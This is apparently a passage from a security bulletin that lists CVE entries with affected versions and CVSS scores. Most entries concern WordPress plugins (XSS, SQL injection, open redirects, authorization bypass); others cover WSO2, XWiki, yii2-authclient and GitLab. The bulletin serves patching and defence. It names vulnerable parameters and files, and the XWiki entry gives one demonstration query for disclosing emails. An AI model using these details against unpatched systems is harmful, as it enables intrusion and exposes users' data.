wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in Glen Don L. Mongaya Drag and Drop Multiple File Upload for WooCommerce. This issue affects Drag and Drop Multiple File Upload for WooCommerce: from n/a through 1.0.8. | 2023-12-21 | 6.5 | CVE-2022-45377
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Tribulant Slideshow Gallery LITE. This issue affects Slideshow Gallery LITE: from n/a through 1.7.6. | 2023-12-20 | 6.7 | CVE-2023-28491
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce Shipping Multiple Addresses. This issue affects Shipping Multiple Addresses: from n/a through 3.8.3. | 2023-12-21 | 6.5 | CVE-2023-32799
wordpress — wordpress | URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Magazine3 Core Web Vitals & PageSpeed Booster. This issue affects Core Web Vitals & PageSpeed Booster: from n/a through 1.0.12. | 2023-12-19 | 6.1 | CVE-2023-35883
wordpress — wordpress | URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms. This issue affects Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms: from n/a through 1.3.3. | 2023-12-19 | 6.1 | CVE-2023-37982
wordpress — wordpress | URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for WooCommerce and QuickBooks. This issue affects Integration for WooCommerce and QuickBooks: from n/a through 1.2.3. | 2023-12-19 | 6.1 | CVE-2023-38478
wordpress — wordpress | URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin. This issue affects Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin: from n/a before 1.3.7. | 2023-12-19 | 6.1 | CVE-2023-38481
wordpress — wordpress | URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Doofinder Doofinder WP & WooCommerce Search. This issue affects Doofinder WP & WooCommerce Search: from n/a through 1.5.49. | 2023-12-19 | 6.1 | CVE-2023-40602
wordpress — wordpress | URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Swapnil V. Patil Login and Logout Redirect. This issue affects Login and Logout Redirect: from n/a through 2.0.3. | 2023-12-19 | 6.1 | CVE-2023-41648
wordpress — wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Media File Renamer: Rename Files (Manual, Auto & AI). This issue affects Media File Renamer: Rename Files (Manual, Auto & AI): from n/a through 5.6.9. | 2023-12-19 | 6.5 | CVE-2023-44991
wordpress — wordpress | URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in SERVIT Software Solutions affiliate-toolkit – WordPress Affiliate Plugin. This issue affects affiliate-toolkit – WordPress Affiliate Plugin: from n/a through 3.3.9. | 2023-12-19 | 6.1 | CVE-2023-45105
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in KaineLabs Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress. This issue affects Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress: from n/a through 1.2.2. | 2023-12-21 | 6.5 | CVE-2023-47191
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Mahlamusa Who Hit The Page – Hit Counter allows SQL Injection. This issue affects Who Hit The Page – Hit Counter: from n/a through 1.4.14.3. | 2023-12-18 | 6.5 | CVE-2023-47558
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in captainform Forms by CaptainForm – Form Builder for WordPress allows Reflected XSS. This issue affects Forms by CaptainForm – Form Builder for WordPress: from n/a through 2.5.3. | 2023-12-15 | 6.1 | CVE-2023-49170
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS. This issue affects WP Pocket URLs: from n/a through 1.0.2. | 2023-12-15 | 6.1 | CVE-2023-49176
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Gilles Dumas which template file allows Reflected XSS. This issue affects which template file: from n/a through 4.9.0. | 2023-12-15 | 6.1 | CVE-2023-49177
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Mr. Hdwplayer HDW Player Plugin (Video Player & Video Gallery) allows Reflected XSS. This issue affects HDW Player Plugin (Video Player & Video Gallery): from n/a through 5.0. | 2023-12-15 | 6.1 | CVE-2023-49178
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Fabio Marzocca List all posts by Authors, nested Categories and Titles allows Reflected XSS. This issue affects List all posts by Authors, nested Categories and Titles: from n/a through 2.7.10. | 2023-12-15 | 6.1 | CVE-2023-49182
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in NextScripts NextScripts: Social Networks Auto-Poster allows Reflected XSS. This issue affects NextScripts: Social Networks Auto-Poster: from n/a through 4.4.2. | 2023-12-15 | 6.1 | CVE-2023-49183
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Doofinder Doofinder WP & WooCommerce Search allows Reflected XSS. This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.1.7. | 2023-12-15 | 6.1 | CVE-2023-49185
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Spoonthemes Adifier – Classified Ads WordPress Theme allows Reflected XSS. This issue affects Adifier – Classified Ads WordPress Theme: from n/a before 3.1.4. | 2023-12-15 | 6.1 | CVE-2023-49187
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in smp7, wp.Insider Simple Membership allows Reflected XSS. This issue affects Simple Membership: from n/a through 4.3.8. | 2023-12-19 | 6.1 | CVE-2023-50376
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Currency.Wiki Currency Converter Widget – Exchange Rates allows Stored XSS. This issue affects Currency Converter Widget – Exchange Rates: from n/a through 3.0.2. | 2023-12-21 | 6.5 | CVE-2023-50822
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Wipeout Media CSS & JavaScript Toolbox allows Stored XSS. This issue affects CSS & JavaScript Toolbox: from n/a through 11.7. | 2023-12-21 | 6.5 | CVE-2023-50823
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brian Batt Insert or Embed Articulate Content into WordPress allows Stored XSS. This issue affects Insert or Embed Articulate Content into WordPress: from n/a through 4.3000000021. | 2023-12-21 | 6.5 | CVE-2023-50824
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Terrier Tenacity iframe Shortcode allows Stored XSS. This issue affects iframe Shortcode: from n/a through 2.0. | 2023-12-21 | 6.5 | CVE-2023-50825
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in VillaTheme CURCY – Multi Currency for WooCommerce allows Stored XSS. This issue affects CURCY – Multi Currency for WooCommerce: from n/a through 2.2.0. | 2023-12-21 | 6.5 | CVE-2023-50831
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ExtendThemes Colibri Page Builder allows Stored XSS. This issue affects Colibri Page Builder: from n/a through 1.0.239. | 2023-12-21 | 6.5 | CVE-2023-50833
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in August Infotech WooCommerce Menu Extension allows Stored XSS. This issue affects WooCommerce Menu Extension: from n/a through 1.6.2. | 2023-12-21 | 6.5 | CVE-2023-50834
wordpress — wordpress | The Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users. | 2023-12-18 | 6.1 | CVE-2023-5348
wordpress — wordpress | The Slider WordPress plugin before 3.5.12 does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated user, such as a subscriber, to access the content of arbitrary posts, such as private, draft and password-protected ones. | 2023-12-18 | 6.5 | CVE-2023-6077
wordpress — wordpress | The Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘et_pb_text’ shortcode in all versions up to, and including, 4.23.1 due to insufficient input sanitization and output escaping on user supplied custom field data. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-23 | 6.4 | CVE-2023-6744
wordpress — wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Popup Maker Popup Maker – Popup for opt-ins, lead gen, & more. This issue affects Popup Maker – Popup for opt-ins, lead gen, & more: from n/a through 1.17.1. | 2023-12-20 | 5.3 | CVE-2022-47597
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in File Manager by Bit Form Team File Manager – 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager. This issue affects File Manager – 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager: from n/a through 5.2.7. | 2023-12-20 | 5.5 | CVE-2022-47599
wordpress — wordpress | Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Hal Gatewood Dashicons + Custom Post Types. This issue affects Dashicons + Custom Post Types: from n/a through 1.0.2. | 2023-12-21 | 5.4 | CVE-2023-22674
wordpress — wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Smackcoders Export All Posts, Products, Orders, Refunds & Users. This issue affects Export All Posts, Products, Orders, Refunds & Users: from n/a through 2.4.1. | 2023-12-21 | 5.9 | CVE-2023-2487
wordpress — wordpress | Missing Authorization vulnerability in GamiPress GamiPress – The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress. This issue affects GamiPress – The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress: from n/a through 2.5.6. | 2023-12-19 | 5.4 | CVE-2023-25715
wordpress — wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Winwar Media WordPress Email Marketing Plugin – WP Email Capture. This issue affects WordPress Email Marketing Plugin – WP Email Capture: from n/a through 3.10. | 2023-12-21 | 5.3 | CVE-2023-28421
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 1.15.78. | 2023-12-21 | 5.4 | CVE-2023-32747
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in MarketingFire Editorial Calendar. This issue affects Editorial Calendar: from n/a through 3.7.12. | 2023-12-20 | 5.4 | CVE-2023-36520
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in Jordy Meow Photo Engine (Media Organizer & Lightroom). This issue affects Photo Engine (Media Organizer & Lightroom): from n/a through 6.2.5. | 2023-12-20 | 5.4 | CVE-2023-38513
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in WP Sunshine Sunshine Photo Cart: Free Client Galleries for Photographers. This issue affects Sunshine Photo Cart: Free Client Galleries for Photographers: from n/a before 3.0.0. | 2023-12-20 | 5.3 | CVE-2023-41796
wordpress — wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina). This issue affects Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina): from n/a through 6.4.5. | 2023-12-19 | 5.3 | CVE-2023-44982
wordpress — wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Aruba.It Aruba HiSpeed Cache. This issue affects Aruba HiSpeed Cache: from n/a through 2.0.6. | 2023-12-19 | 5.3 | CVE-2023-44983
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in A WP Life Event Monster – Event Management, Tickets Booking, Upcoming Event allows Stored XSS. This issue affects Event Monster – Event Management, Tickets Booking, Upcoming Event: from n/a through 1.3.2. | 2023-12-21 | 5.9 | CVE-2023-47525
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Sajjad Hossain Sagor WP Edit Username allows Stored XSS. This issue affects WP Edit Username: from n/a through 1.0.5. | 2023-12-21 | 5.9 | CVE-2023-47527
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Till Krüss Email Address Encoder allows Stored XSS. This issue affects Email Address Encoder: from n/a through 1.0.22. | 2023-12-15 | 5.4 | CVE-2023-48765
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Kulwant Nagi Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates. This issue affects Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates: from n/a through 3.0.5. | 2023-12-18 | 5.4 | CVE-2023-49148
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in formzu Inc. Formzu WP allows Stored XSS. This issue affects Formzu WP: from n/a through 1.6.6. | 2023-12-15 | 5.4 | CVE-2023-49160
wordpress — wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress. This issue affects BigCommerce For WordPress: from n/a through 5.0.6. | 2023-12-21 | 5.3 | CVE-2023-49162
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Real Big Plugins Client Dash allows Stored XSS. This issue affects Client Dash: from n/a through 2.2.1. | 2023-12-15 | 5.4 | CVE-2023-49165
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS. This issue affects Ads by datafeedr.Com: from n/a through 1.2.0. | 2023-12-15 | 5.4 | CVE-2023-49169
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS. This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5. | 2023-12-15 | 5.4 | CVE-2023-49174
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Kreativo Pro KP Fastest Tawk.To Chat allows Stored XSS. This issue affects KP Fastest Tawk.To Chat: from n/a through 1.1.1. | 2023-12-15 | 5.4 | CVE-2023-49175
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in N.O.U.S. Open Useful and Simple Event post allows Stored XSS. This issue affects Event post: from n/a through 5.8.6. | 2023-12-15 | 5.4 | CVE-2023-49179
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WP Event Manager WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce allows Stored XSS. This issue affects WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce: from n/a through 3.1.40. | 2023-12-15 | 5.4 | CVE-2023-49181
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WPDeveloper Parallax Slider Block allows Stored XSS. This issue affects Parallax Slider Block: from n/a through 1.2.4. | 2023-12-15 | 5.4 | CVE-2023-49184
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WebFactory Ltd Guest Author allows Stored XSS. This issue affects Guest Author: from n/a through 2.3. | 2023-12-15 | 5.4 | CVE-2023-49747
wordpress — wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in AppMySite AppMySite – Create an app with the Best Mobile App Builder. This issue affects AppMySite – Create an app with the Best Mobile App Builder: from n/a through 3.11.0. | 2023-12-21 | 5.3 | CVE-2023-49762
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus. This issue affects WP Photo Album Plus: from n/a through 8.5.02.005. | 2023-12-19 | 5.3 | CVE-2023-49812
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in LiveChat LiveChat – WP live chat plugin for WordPress. This issue affects LiveChat – WP live chat plugin for WordPress: from n/a through 4.5.15. | 2023-12-18 | 5.4 | CVE-2023-49821
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in BoldThemes Bold Page Builder allows Stored XSS. This issue affects Bold Page Builder: from n/a through 4.6.1. | 2023-12-15 | 5.4 | CVE-2023-49823
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in AB-WP Simple Counter allows Stored XSS. This issue affects Simple Counter: from n/a through 1.0.2. | 2023-12-21 | 5.9 | CVE-2023-50377
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Freshlight Lab Menu Image, Icons made easy allows Stored XSS. This issue affects Menu Image, Icons made easy: from n/a through 3.10. | 2023-12-21 | 5.9 | CVE-2023-50826
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Accredible Accredible Certificates & Open Badges allows Stored XSS. This issue affects Accredible Certificates & Open Badges: from n/a through 1.4.8. | 2023-12-21 | 5.9 | CVE-2023-50827
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in David Vongries Ultimate Dashboard – Custom WordPress Dashboard allows Stored XSS. This issue affects Ultimate Dashboard – Custom WordPress Dashboard: from n/a through 3.7.11. | 2023-12-21 | 5.9 | CVE-2023-50828
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Aerin Loan Repayment Calculator and Application Form allows Stored XSS. This issue affects Loan Repayment Calculator and Application Form: from n/a through 2.9.3. | 2023-12-21 | 5.9 | CVE-2023-50829
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Seosbg Seos Contact Form allows Stored XSS. This issue affects Seos Contact Form: from n/a through 1.8.0. | 2023-12-21 | 5.9 | CVE-2023-50830
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Mondula GmbH Multi Step Form allows Stored XSS. This issue affects Multi Step Form: from n/a through 1.7.13. | 2023-12-21 | 5.9 | CVE-2023-50832
wordpress — wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Praveen Goswami Advanced Category Template. This issue affects Advanced Category Template: from n/a through 0.1. | 2023-12-19 | 5.4 | CVE-2023-50835
wordpress — wordpress | The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘ihrss-gallery’ shortcode in versions up to, and including, 13.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-19 | 5.4 | CVE-2023-5413
wordpress — wordpress | The Jquery news ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘jquery-news-ticker’ shortcode in versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-19 | 5.4 | CVE-2023-5432
wordpress — wordpress | The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn’t restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site’s code | 2023-12-18 | 5.3 | CVE-2023-6065
wordpress — wordpress | The WP Shortcodes Plugin – Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘su_button’, ‘su_members’, and ‘su_tabs’ shortcodes in all versions up to, and including, 7.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-19 | 5.4 | CVE-2023-6488
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in XWP Stream. This issue affects Stream: from n/a through 3.9.2. | 2023-12-19 | 4.3 | CVE-2022-43450
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in weDevs Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy. This issue affects Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.19. | 2023-12-19 | 4.4 | CVE-2023-34382
wordpress — wordpress | URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Parcel Pro. This issue affects Parcel Pro: from n/a through 1.6.11. | 2023-12-19 | 4.7 | CVE-2023-46624
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS. This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2. | 2023-12-15 | 4.8 | CVE-2023-49180
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS. This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 1.4. | 2023-12-15 | 4.8 | CVE-2023-49188
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin – GetSocial.Io allows Stored XSS. This issue affects Social Share Buttons & Analytics Plugin – GetSocial.Io: from n/a through 4.3.12. | 2023-12-15 | 4.8 | CVE-2023-49189
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS. This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6. | 2023-12-15 | 4.8 | CVE-2023-49190
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS. This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2. | 2023-12-15 | 4.8 | CVE-2023-49191
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Stored XSS. This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24. | 2023-12-15 | 4.8 | CVE-2023-49767
wordpress — wordpress | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Themeum Tutor LMS – eLearning and online course solution allows Stored XSS. This issue affects Tutor LMS – eLearning and online course solution: from n/a through 2.2.4. | 2023-12-15 | 4.8 | CVE-2023-49829
wordpress — wordpress | The Autocomplete Location field Contact Form 7 WordPress plugin before 3.0, autocomplete-location-field-contact-form-7-pro WordPress plugin before 2.0 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) | 2023-12-18 | 4.8 | CVE-2023-5005
wordpress — wordpress | The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin’s settings, which may include sensitive information such as Cloudflare API tokens. | 2023-12-18 | 4.3 | CVE-2023-6289
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in Blaz K. Rate my Post – WP Rating System. This issue affects Rate my Post – WP Rating System: from n/a through 3.4.1. | 2023-12-21 | 4.3 | CVE-2023-49765
wso2 — api_manager | Due to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response. | 2023-12-15 | 5.3 | CVE-2023-6839; ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — api_manager/iot_server | Multiple WSO2 products have been identified as vulnerable due to lack of server-side input validation in the Forum feature, API rating could be manipulated. | 2023-12-15 | 4.3 | CVE-2023-6835; ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — multiple_products | Reflected XSS vulnerability can be exploited by tampering a request parameter in Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests. | 2023-12-15 | 6.1 | CVE-2023-6838; ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — multiple_products | Multiple WSO2 products have been identified as vulnerable due to improper output encoding, a Stored Cross Site Scripting (XSS) attack can be carried out by an attacker injecting a malicious payload into the Registry feature of the Management Console. | 2023-12-18 | 4.8 | CVE-2023-6911; ed10eef1-636d-4fbe-9993-6890dfa878f8
xwiki — xwiki | XWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki’s regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability. | 2023-12-15 | 5.3 | CVE-2023-50720
yiisoft — yii2-authclient | yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth1/2 `state` and OpenID Connect `nonce` is vulnerable for a `timing attack` since it is compared via regular string comparison (instead of `Yii::$app->getSecurity()->compareString()`). Version 2.2.15 contains a patch for the issue. No known workarounds are available. | 2023-12-22 | 6.1 | CVE-2023-50708
yiisoft — yii2-authclient | yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth2 PKCE implementation is vulnerable in 2 ways. First, the `authCodeVerifier` should be removed after usage (similar to `authState`). Second, there is a risk for a `downgrade attack` if PKCE is being relied on for CSRF protection. Version 2.2.15 contains a patch for the issue. No known workarounds are available. | 2023-12-22 | 6.8 | CVE-2023-50714


Low Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction. | 2023-12-15 | 3.5 | CVE-2023-48608
automad — automad | A vulnerability was found in automad up to 1.10.9 and classified as problematic. Affected by this issue is some unknown functionality of the file packages\standard\templates\post.php of the component Setting Handler. The manipulation of the argument sitename leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 2.4 | CVE-2023-7035
code-projects — faculty_management_system | A vulnerability, which was classified as problematic, has been found in code-projects Faculty Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/pages/yearlevel.php. The manipulation of the argument Year Level/Section leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248744. | 2023-12-22 | 3.5 | CVE-2023-7057
code-projects — faculty_management_system | A vulnerability classified as problematic was found in code-projects Faculty Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/pages/subjects.php. The manipulation of the argument Description/Units leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248743. | 2023-12-22 | 2.4 | CVE-2023-7056
code-projects — point_of_sales_and_inventory_management_system | A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /main/checkout.php. The manipulation of the argument pt leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248846 is the identifier assigned to this vulnerability. | 2023-12-22 | 3.5 | CVE-2023-7075
enterprise_server — enterprise_server | A race condition in GitHub Enterprise Server allowed an existing admin to maintain permissions on transferred repositories by making a GraphQL mutation to alter repository permissions during the transfer. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 3.9 | CVE-2023-6690
enterprise_server — enterprise_server | An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be read with an improperly scoped token. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 2.7 | CVE-2023-51380
gallagher — controller_6000 | Sensitive information uncleared after debug/power state transition in the Controller 6000 could be abused by an attacker with knowledge of the Controller’s default diagnostic password and physical access to the Controller to view its configuration through the diagnostic web pages. This issue affects: Gallagher Controller 6000 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), v8.60 or earlier. | 2023-12-18 | 2.4 | CVE-2023-41967
gallagher — multiple_products | Improper input validation of a large HTTP request in the Controller 6000 and Controller 7000 optional diagnostic web interface (Port 80) can be used to perform a Denial of Service of the diagnostic web interface. This issue affects: Gallagher Controller 6000 and 7000 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior. | 2023-12-18 | 3.1 | CVE-2023-22439
gitlab — gitlab | An issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they’re not a member of. | 2023-12-15 | 3.5 | CVE-2023-3511
